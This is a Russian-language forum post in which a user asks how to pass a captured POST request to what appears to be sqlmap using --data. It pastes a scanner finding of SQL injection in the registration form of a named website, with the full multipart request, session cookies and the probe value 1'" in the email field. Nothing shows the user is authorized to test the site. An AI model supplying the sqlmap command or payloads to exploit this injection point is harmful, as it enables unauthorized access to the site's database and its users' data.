03.06.2020, 18:12
|
|
Новичок
Регистрация: 14.01.2016
Сообщений: 7
С нами:
5437046
Репутация:
0
|
|
Добрый день,подскажите пожалуйста как вставить вот такую пост ссылку в мап.Я так понимаю нужно прописать еще --data.спасибо
http://prntscr.com/st216j
Код:
The vulnerability affects https://aachibilyaev.com/cabinet/registration/ , REGISTER[EMAIL]
Discovered by SQL injection
Attack Details
arrow_drop_up
POST (multipart) input REGISTER[EMAIL] was set to 1'"
Error message found:
You have an error in your SQL syntax
Код:
POST /cabinet/registration/?backurl=/cabinet/®ister=yes HTTP/1.1
Content-Type: multipart/form-data; boundary=----------Q9OXvYdJGy9b
Referer: https://aachibilyaev.com/
Cookie: PHPSESSID=ivp6k01981u5ild8o166grp2r0;BITRIX_SM_GUEST_ID=139605;BITRIX_SM_LAST_VISIT=03.06.2020+14%3A00%3A45;io=NVTaYGNo3vUnQsF_AAiQ;tmr_reqNum=26;BITRIX_CONVERSION_CONTEXT_s1=%7B%22ID%22%3A1%2C%22EXPIRE%22%3A1591217940%2C%22UNIQUE%22%3A%5B%22conversion_visit_day%22%5D%7D;catalogViewMode=list;_ym_debug=null;last_visit=1591170065298::1591180865298;top100_id=t1.6912325.390564327.1591180865288
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate
Content-Length: 1021
Host: aachibilyaev.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Connection: Keep-alive
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[CONFIRM_PASSWORD]"
g00dPa$$w0rD
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[EMAIL]"
1'"
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[LOGIN]"
1
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[NAME]"
TWSfSopc
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[PASSWORD]"
g00dPa$$w0rD
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="REGISTER[PERSONAL_PHONE]"
555-666-0606
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="backurl"
/cabinet/
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="licenses_popup"
Y
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="register_submit_button"
reg
------------Q9OXvYdJGy9b
Content-Disposition: form-data; name="register_submit_button1"
register_submit_button1=Регистрация
------------Q9OXvYdJGy9b--
|
|
|